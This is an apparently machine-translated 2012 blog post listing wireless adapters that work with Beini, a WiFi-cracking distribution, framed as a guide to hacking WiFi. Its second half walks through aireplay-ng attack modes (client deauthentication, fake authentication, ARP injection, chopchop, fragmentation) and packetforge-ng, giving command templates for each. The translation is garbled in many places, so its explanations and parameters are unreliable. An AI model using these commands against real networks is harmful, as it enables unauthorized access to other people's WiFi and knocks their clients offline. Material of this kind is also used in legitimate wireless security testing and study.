前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Beini Compatible Hardware List

Beini Compatible Hardware List

作者头像
阿新
发布2018-04-12 15:29:40
1.1K0
发布2018-04-12 15:29:40
举报
文章被收录于专栏:c#开发者c#开发者

Beini Compatible Hardware List

Do not expect that you will be able to hack WiFi with your default internal WiFi card or Mac's Airport. As stated in the beginning, you will need some compatible hardware, check out the list. I recommend anything with an RTL8187L chip or RT3070 chip or compatible device made by ALFA. Also devices with directional or yagi antennas work best. If you have a compatible chipset as listed below, give that a go. The blank sections have unknown compatibility at this time but are likely to be compatible. Check here for XiaopanOS compatible hardware

Product Name (chip)

Bus

Beini system version

Notes

1.0-RC5.2 | 1.1

1.0-in Final

1.2.1

1.2.2

TP-LINK TL-WN321G + Ver: 1.0(RT73)

USB

Compatible

Compatible

Compatible

Compatible

TP-LINK TL-WN322G + Ver: 1.0(ZD1211rw)

USB

Compatible

Compatible

TP-LINK TL-WN322G + Ver: 2.0(Atheros 9271)

USB

Not compatible

Not compatible

Not compatible

Compatible

54Mbps

TP-LINK TL-WN422G + Ver: 1.0(ZD1211rw)

USB

Compatible

Compatible

TP-LINK TL-WN422G + Ver: 2.0(Atheros 9271)

USB

Not compatible

Not compatible

Not compatible

Compatible

TP-LINK TL-WN821N. Ver: 2.0(Atheros 9.17 thousand)

USB

Compatible

Compatible

Compatible

Compatible

TP-LINK TL-WN821N. Ver: 3.0(Atheros)

USB

Not compatible

Not compatible

Not compatible

Compatible

300Mbps

TP-LINK TL-WN550G Ver: 1.0 (theAtheros 5k)

PCI

Compatible

Compatible

TP-LINK TL-WN551G REV: 1.5E(Atheros 5k)

PCI

Compatible

Compatible

TP-LINK TL-WN721N Ver: 1.0(Atheros 9271)

USB

Not compatible

Not compatible

Not compatible

Compatible

TP-LINK TL-WN722N Ver: 1.0(Atheros 9271)

USB

Not compatible

Not compatible

Not compatible

Compatible

150Mbps

TP-LINK TL-WN310G Ver: 2.4(Atheros 2413)

PCMCIA

Compatible

Compatible

TP-LINK TL-WN7200ND Ver: 1.0(RT3070)

USB

Compatible

150Mbps

TP-LINK TL-WN822N Ver: 1.0(Atheros AR9170)

USB

Compatible

Compatible

300Mbps

Asus USB-G31 (RT73)

USB

Compatible

Compatible

Compatible

Compatible

The Asus WL-167g (RT73)

USB

Compatible

Compatible

Compatible

Compatible

The Asus WL-107g (Ralink 2560)

USB

Compatible

Compatible

D-Link DWL-G122 H / W Ver: C1 F / W Ver: 3.00 (RT73)

USB

Compatible

Compatible

D-Link DWL-G122 H / W Ver: F1 F / W Ver: 6.00 (RTL8188S)

USB

Not compatible

Not compatible

Not compatible

Not compatible

D-Link G the DWA-110 H / W Ver: A1 F / W Ver: 1.00 (RT73)

USB

Compatible

Compatible

D-Link DWL-G650 + AH / W Ver: E2 F / W Ver: 5.00 (Ralink 2561 PCI RT61PCI)

PCMCIA

Compatible

Compatible

Compatible

Compatible

D-Link, the DWA-130 H / W Ver: C1 F / W Ver: 1.20 ()

USB

Not compatible

Not compatible

D-Link, the DWA-130 H / W Ver: C2 F / W Ver: 3.00 ()

USB

Not compatible

Not compatible

The D-Link, the DWA-133 H / W Ver: A1 F / W Ver: 1.00 ()

USB

Not compatible

Not compatible

Not compatible

Not compatible

D-Link DWL-G122 H / W Ver: F1 F / W Ver: 6.00 ()

USB

Not compatible

Not compatible

Not compatible

Not compatible

D-Link DWA-125 H / W Ver: A2 F / W Ver: 1.30 (RT3070)

USB

Not compatible

Not compatible

Compatible

Compatible

D-Link DWA-125 H / W Ver: A2 F / W Ver: 1.40 (RT3070)

USB

Not compatible

Not compatible

Compatible

Compatible

FAST FW54U Ver: 5.0 (ZD1211)

USB

Compatible

Compatible

FAST FW54U Ver: 7.0 (Atheros 9271)

USB

Not compatible

Not compatible

Not compatible

Compatible

54Mbps

NETGEAR WG111v2 (RTL8187L)

USB

Compatible

Not compatible

Compatible

Compatible

NETGEAR WG111v3 (RTL8187B)

USB

Compatible

Not compatible

Not compatible

Not compatible

NETGEAR WN111v2 (Atheros AR9170)

USB

Compatible

Compatible

IP-COM W321G + ()

USB

Not compatible

Not compatible

IP-COM W323G + ()

USB

Not compatible

Not compatible

IP-COM W821U ()

USB

Not compatible

Not compatible

IP-COM W550G V1.0 (Marvell 88w8335-TGJ1 (rev 03))

PCI

Not compatible

Not compatible

Tenda TWL541C (Marvell 88w8335)

PCI

Not compatible

Not compatible

Tenda W302P V1.1 (RT2760T)

USB

Not compatible

Not compatible

Tenda W311U (Ralink 2800)

USB

Not compatible

Not compatible

Compatible

Compatible

150Mbps

Tenda W311Ma

USB

Not compatible

Not compatible

Not compatible

Not compatible

150Mbps

Tenda W311M

USB

Not compatible

Not compatible

Not compatible

Not compatible

Tenda W541U Ver: 2.0 (Ralink 2800)

USB

Not compatible

Not compatible

Compatible

Compatible

BUFFALO BUF-WLIUCG-1 (B) MODEL: WLI-UC-G (MelCo 0411:0137)

USB

Not compatible

Not compatible

Mercurycom (Mercury) MW54U VER 6.0 (RT73)

USB

Compatible

Compatible

Mercurycom (Mercury) MW54U VER 7.0 (Atheros 9271)

USB

Not compatible

Not compatible

Not compatible

SAGEM with (Sagem) XG-760N(ZD1211B)

USB

Compatible

Compatible

SAGEM with (Sagem) XG-703A(GW3887)

USB

Compatible

Compatible

Compatible

Compatible

INVENTEL the (UBS) ur054g, ( R01 ) V1.1 (GW3887)

USB

Compatible

Compatible

Compatible

Compatible

LinkSys wusb54g V4 (RT2571F)

USB

Compatible

Compatible

NEC Aterm WL54AG (AR5212)

PCMCIA

Compatible

Compatible

CNet CUA-854L WIFI USB 11G(RT73)

USB

Compatible

Compatible

AWUS036NEH (RT2870)

USB

Compatible

Compatible

Wireless LAN chip

(Intel 2100BG)

Mini-PCI

Compatible

Compatible

(Intel 2200BG)

Mini-PCI

Compatible

Compatible

(Intel 3945ABG)

PCI-E

Compatible

Compatible

Compatible

Compatible

(Intel 1000BGN)

PCI-E

Compatible

Compatible

Compatible

Compatible

(Intel 5100AGN)

PCI-E

Compatible

Compatible

Compatible

Compatible

(Intel 5300AGN)

PCI-E

Compatible

Compatible

(Intel 6000)

PCI-E

Compatible

Compatible

(Intel 4965AG)

PCI-E

Compatible

Compatible

(Atheros AR5B91)

PCI-E

(Atheros AR5B93)

PCI-E

Compatible

Compatible

Compatible

(Atheros AR928X)

PCI-E

Compatible

Compatible

Other Notes

• When installing the ISO through Parallels or VMware, you need to select 'Other Linux 2.6' When you add the virtual machine.

• If Beini cannot detect your card or USB device, delete the devices drivers off your Mac

• Get a directional antenna with an SMA connector for better range. Check eBay, Amazon etc.

• Track Beini's developments @ google code

Modes Explained

The -0 Deautenticate [Conflict Mode]

Forced to disconnect the connection to reconnect with the routing side has been connected to the legitimate client. Reconnect the packet, resulting in an effective ARP Request. If a client is connected to the routing side, but no one online to produce valid data, then, that the use of -3 is also unable to produce an effective ARP the Request. Therefore need to use the -0 attack mode with -3 attack will be immediately activated.

代码语言:javascript
复制
aireplay - ng - 0  10  - a < AP MAC >  - c < My the MAC >  Wifi0  parameters Description:  [- ]: conflict attack mode, followed by the number sent (set to 0 , compared with cyclic attacks of disconnect connection, the client does the Internet)  [- ]: set AP MAC [- c ]: the set has been connected to the legitimate client MAC . If you do not set a - c , then disconnect all and AP connectivity.  aireplay - ng - 3  - b < the AP MAC >  - h < My MAC >  Wifi0 of

Note: Using this attack mode the premise must be connected to the router through the certification of a legitimate client

-1 Fakeauth Count [disguised client connection]

This model is to disguise a client and the AP to connect. This step is non-client research study a first step, because no legitimate connection to the client, and therefore need a disguise client and the router is connected to. AP to receive packets, you must make your own card and AP association. If there is no associated target AP will ignore all packets sent from your network card, the IVS data will not produce.

-1 Disguised client successfully connected to send into the command, the router receives inject command only after the feedback data to thereby generate the ARP packet.

代码语言:javascript
复制
aireplay - ng - 1  0  - e < the AP the ESSID >  - a < AP MAC >  - h < My the MAC >  Wifi0  parameters Description:  [- ]: the Camouflage client connection mode, the latter with the delay  [- e ]: set AP the of [- a ]: set AP MAC [- h ]: set disguise the client's network card MAC (ie, network card MAC )

-2 Interactive, [interactive mode]

The interactive mode is a packet capture and mentioning that the data sent attack packets, three with the collection mode A. This mode is mainly used to study learning without the client, -1 and to establish a false client connections and direct contracting attack

代码语言:javascript
复制
aireplay - ng - 2  - p 0 841  - c ff. : ff : ff : ff : ff : ff - b < the AP MAC >  - h < My the MAC >  Wifi0  parameters Description:  [- ]: interactive attack modes  [- p ]: set of the information contained in the control frame ( 16  hex), default  0841  [- c ]: set the destination MAC address  [- ]: set the AP 's MAC address  [- h ]: Set the disguised client network card MAC (ie, card MAC )  2 . Extract the package, send inject packets  aireplay - ng - 2  - the r <file>  - x 1024  Wifi0  contracting attacks. which - x 1024  is the contracting speed to avoid the card crashes, you can choose  1024 .

-3 ARP Request [injected into the attack mode]

This mode is very effective to analyze the process of re-issued in one packet capture after such an attack mode. Both can take advantage of a legitimate client, you can also camouflage the client with the -1 virtual connection.

If a legitimate client that generally need to wait a few minutes, so that the communication between the legitimate client and AP, a small amount of data can produce an effective ARP Request only -3 mode into success. If no communication exists, can not get the ARP Request this attack will fail. A long period of time between the legitimate client and AP ARP the Request, you can try to use the -0 attack. If there is no legitimate client, you can use -1 to create a virtual connection camouflage client connection process packet. The resulting ARP Request. ANSI -3 mode injection.

代码语言:javascript
复制
aireplay - ng - 3  - b < the AP MAC >  - h < My the MAC  - x 512  Wifi0  parameters Description:  [- 3 ]: ARP injection attack mode  [- ]: set AP MAC [- h ]: set  [- x ]: the number of households package of the definition to send data per second, but the maximum does not exceed  1024 , it is recommended to use  512 (or not defined)

-4 Chopchop [Attack Mode]

To a xor file containing the key data in this mode is mainly to get a xor file containing the key data, can not be used to decrypt the packet.

But use it to generate a new packet so that we can be injected.

代码语言:javascript
复制
aireplay - ng - 4  - b < the AP MAC >  - h < My the MAC >  Wifi0  parameters Description:  [- ]: Set the research study, the AP MAC [- h ]: connection set up a virtual disguise MAC (NIC MAC )

-5 Fragment [fragmented packet attack mode]

Used to obtain PRGA (the suffix containing the key of the xor file)

This model one can use PRGA here PRGA is not WEP Key data can not be used to decrypt the packets. But use it to generate a new packet so that we can be injected. Its working principle is the target AP to re-broadcast packets, when the AP re-broadcast, a new IVS will produce, we use this to study the learning!

代码语言:javascript
复制
aireplay - ng - 5  - b < the AP MAC >  - h < My the MAC >  Wifi0  parameters Description:  [- ]: fragmented packet attack mode  [- ]: set AP MAC [- h ]: Set the virtual camouflage to connect the MAC (ie NIC MAC )  packetforge, - ng : packet manufacturing procedures  packetforge - ng <mode>  <options>  packetforge - ng - 0  - a < the AP MAC >  - h < My the MAC >  Wifi0  - k 255.255 . 255.255  - l 255.255 255.255 - y < xor the file >  - w mr parameter Description:  [- ]: camouflage ARP packets  [- ]: set the AP MAC [- h ]: set up a virtual disguise connection MAC ( MAC )  [- k ]: < ip [: port ]> Description: Set the target file IP and port  [- l ]: < ip [: port ]> Description: Set the source file, IP and port  [- y ]: < file > Description: xor file . Followed by xor .  [- w ]: set camouflage file name
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2012-05-17 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • The -0 Deautenticate [Conflict Mode]
  • -2 Interactive, [interactive mode]
  • -3 ARP Request [injected into the attack mode]
  • -4 Chopchop [Attack Mode]
  • -5 Fragment [fragmented packet attack mode]
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档